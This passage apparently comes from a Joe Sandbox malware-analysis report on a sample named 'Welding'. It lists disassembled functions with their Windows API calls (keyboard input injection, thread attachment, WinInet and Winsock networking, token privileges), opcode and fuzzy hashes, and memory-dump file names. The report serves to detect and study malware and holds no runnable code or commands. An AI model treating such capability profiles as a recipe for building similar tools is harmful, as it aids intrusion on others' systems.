API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bc04b2eb04b2a7c2f5b29f04db1ee4ee2976749f84fcf2a0f375de4d5e884ae8
Instruction ID: 9bcbcf7089b19beb4bd66b005b8d0c4f9dae9b11d2613c846fad5fa7991afa1f
Opcode Fuzzy Hash: bc04b2eb04b2a7c2f5b29f04db1ee4ee2976749f84fcf2a0f375de4d5e884ae8
Instruction Fuzzy Hash: 02514D75A04209AFDF10DF58C8849AE7BB6FF45320F148669F915DB2A0D770AD91CB90

Function 000D492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000D49C0
__flush.LIBCMT ref: 000D49E0
__write.LIBCMT ref: 000D4A13
__flsbuf.LIBCMT ref: 000D4A41

Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 751c2c110ab772d291df6090b1e87a96a5d5f07b86c74e424d2849ae06327b6c
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 3D41B531600706ABDF688FAEC8909AFB7E5AF41360B24817FE855C7740D7709D418B65

Function 0010A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0010A68A
__itow.LIBCMT ref: 0010A6BB

Part of subcall function 0010A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0010A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0010A724
__itow.LIBCMT ref: 0010A77B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
Instruction ID: 67efd406c4f6a83e91122808bafcfc3f185fa5bff3afcb5e5e43517cc29dc184
Opcode Fuzzy Hash: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
Instruction Fuzzy Hash: 2141BE75A00308AFDF11EF54C846FEE7BB9EF49750F404029F945A32D2DBB19A44CAA2

Function 00127095 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

#23.WSOCK32(00000002,00000002,00000011), ref: 001270BC
#111.WSOCK32(00000000), ref: 001270CC

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00127130
#111.WSOCK32(00000000), ref: 0012713C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #111$__itow__swprintf
String ID:
API String ID: 3577594119-0
Opcode ID: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
Instruction ID: bb2f0b42d445f1b6fa7902afcf577178db26a73108823e8bc11482a655208c82
Opcode Fuzzy Hash: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
Instruction Fuzzy Hash: F641AE757402106FEB25AF24EC86FAA77A4DF04B10F048458FA59AB3D3DB749E108B95

Function 00126B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00140980), ref: 00126B92
_strlen.LIBCMT ref: 00126BC4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e0cb1ca4c62b250220494d22d79a1d8ac0e4e5429a61dd276fae4ba87b481df0
Instruction ID: c19ba70fc9ab1387e4826e8dc71d13c0462ba52b5c86d59f1049a628634aa3e1
Opcode Fuzzy Hash: e0cb1ca4c62b250220494d22d79a1d8ac0e4e5429a61dd276fae4ba87b481df0
Instruction Fuzzy Hash: 7B41A071A00119ABCB14FB64EC95FEEB3A9EF54310F148159F91A972D3DB30AE61C790

Function 0011BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0011BEE1
GetLastError.KERNEL32(?,00000000), ref: 0011BF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0011BF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0011BF58

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: ce713889619706534e06d43a6b06524b9947de9c911248c2299528ae40923e66
Instruction ID: 2bb6a641904713884d97a69b61d6b8f7105e954d2008f34c393b3a290be15250
Opcode Fuzzy Hash: ce713889619706534e06d43a6b06524b9947de9c911248c2299528ae40923e66
Instruction Fuzzy Hash: 5E413639600A11DFCB15EF15C485A99BBF1EF89320B09C498E94A9B363CB30FD42CB95

Function 00138E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00138F03

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
Instruction ID: 0478ef645973a8fe4a0eea5ae4e8791f3bcec73fb21b40c887a1da637655e365
Opcode Fuzzy Hash: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
Instruction Fuzzy Hash: 6331B034614318EFEF259B18CC49FAC37AAEB0A320F244511FA15D65E1DF75E990CB51

Function 0013B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0013B1D2
GetWindowRect.USER32(?,?), ref: 0013B248
PtInRect.USER32(?,?,0013C6BC), ref: 0013B258
MessageBeep.USER32(00000000), ref: 0013B2C9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
Instruction ID: 9f32ad9d3c72229de0c320c7d091ec38399a4459067852d2b91526dc02b64257
Opcode Fuzzy Hash: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
Instruction Fuzzy Hash: 90418130A08115DFDF11CF98C8C4B9E77F5FF49350F1842A9EA189B265E730A981CB51

Function 001112D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00111326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00111342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001113A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001113FA

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
Instruction ID: d9afe39f2e9bfb9a3d3bf2917b4873e2265f2d4bd92487a98c77bb3f9b28b5b5
Opcode Fuzzy Hash: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
Instruction Fuzzy Hash: AA313930D54618BEFF3D86258805BFDFBA6BB49330F04422AE6A0529D9D3748DC19B55

Function 00111410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,000BECBC,?,00008000), ref: 00111465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00111481
PostMessageW.USER32(00000000,00000101,00000000), ref: 001114E0
SendInput.USER32(00000001,?,0000001C,000BECBC,?,00008000), ref: 00111532

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
Instruction ID: 5bda2fdfa5c9e1c521c215a883071ebf1f47f4f7b4eb375ddeff77185c12a83f
Opcode Fuzzy Hash: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
Instruction Fuzzy Hash: 12315C309442187EFF3D8A659C047FEFB66AB99710F48433AE681529D1C37889D19BA1

Function 000E63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000E642B
__isleadbyte_l.LIBCMT ref: 000E6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E64BD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
Instruction ID: 1306a2fa2f0568efa50c0e44b8d190d4213e6f44b29706275b37529f2204fc56
Opcode Fuzzy Hash: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
Instruction Fuzzy Hash: 6C31F2B1600296AFDB218F66DC44BAB7FE5FF51390F154029F824A71E1DB32E990D750

Function 0013552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0013553F

Part of subcall function 00113B34: GetWindowThreadProcessId.USER32(?,00000000), ref: 00113B4E
Part of subcall function 00113B34: GetCurrentThreadId.KERNEL32 ref: 00113B55
Part of subcall function 00113B34: AttachThreadInput.USER32(00000000,?,001155C0), ref: 00113B5C

GetCaretPos.USER32(?), ref: 00135550
ClientToScreen.USER32(00000000,?), ref: 0013558B
GetForegroundWindow.USER32 ref: 00135591

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
Instruction ID: 0660e802605a99f4eed2f4eeb13b12d8b13fd66fc44f3923213df513d553b157
Opcode Fuzzy Hash: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
Instruction Fuzzy Hash: 3A312B71D00108AFDB00EFA5D8859EEB7F9EF98704F10446AE915E7252EB75AF40CBA0

Function 0013CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

GetCursorPos.USER32(?), ref: 0013CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000EBCEC,?,?,?,?,?), ref: 0013CB8F
GetCursorPos.USER32(?), ref: 0013CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000EBCEC,?,?,?), ref: 0013CC16

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
Instruction ID: bdec606fac7e1b03f500a727fdaab2a1624f42748369c7a7f85e5dc4ac3fe6db
Opcode Fuzzy Hash: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
Instruction Fuzzy Hash: 6831A035600158AFCB15CF59CC59EFABBB5EB4A350F044099F909AB6A1C7329D90EFA0

Function 000D0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 000D0BE2

Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065

_fprintf.LIBCMT ref: 000D0C19
OutputDebugStringW.KERNEL32(?), ref: 0010694C

Part of subcall function 000D4CCA: _flsall.LIBCMT ref: 000D4CE3

__setmode.LIBCMT ref: 000D0C4E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
Instruction ID: 8dec2160417251df2017cd7c1e1022ff2d5b18a40b7762cba3dc747ce0ea549d
Opcode Fuzzy Hash: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
Instruction Fuzzy Hash: 0B11D2319043046BCB18BBA4AC47AFEBB699F41320F14415BF208563C3DF71599297B5

Function 00109274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
Part of subcall function 00108D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
Part of subcall function 00108D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
Part of subcall function 00108D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001092C1
_memcmp.LIBCMT ref: 001092E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0010931A
HeapFree.KERNEL32(00000000), ref: 00109321

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
Instruction ID: 8f8fceb52ef527ae5b71886e3e9f99a240f96f764fc3a7744bbe8279df77c95a
Opcode Fuzzy Hash: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
Instruction Fuzzy Hash: 9B21AF71E40108EFDB10DFA4C955BEEB7B8FF44301F044059E894AB292D7B0AA44CFA0

Function 00121E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00121E6F

Part of subcall function 00121EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00121F18
Part of subcall function 00121EF9: InternetCloseHandle.WININET(00000000), ref: 00121FB5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 614891cd13043e4450f9185ef5f42e212005b352dd2d590954c615f8eb542efe
Instruction ID: 61703d50404462f3d9c4cd3f8b1218f068f8c37855dd5d2247e608daab7763f1
Opcode Fuzzy Hash: 614891cd13043e4450f9185ef5f42e212005b352dd2d590954c615f8eb542efe
Instruction Fuzzy Hash: 9821D435200615BFDB17DF60EC00F7BB7AAFF68700F014019FE4196960DB71A8619B90

Function 00113F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00142C4C), ref: 00113F57
GetLastError.KERNEL32 ref: 00113F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00113F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00142C4C), ref: 00113FD2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 40d4f062607f8005f6232be4559859b1ec0bec91e464b21435e508ff66357a22
Instruction ID: d52d2525373dcbb8e9b4e340b6541411ddffc0a0994fbd8ff49067c75a287e77
Opcode Fuzzy Hash: 40d4f062607f8005f6232be4559859b1ec0bec91e464b21435e508ff66357a22
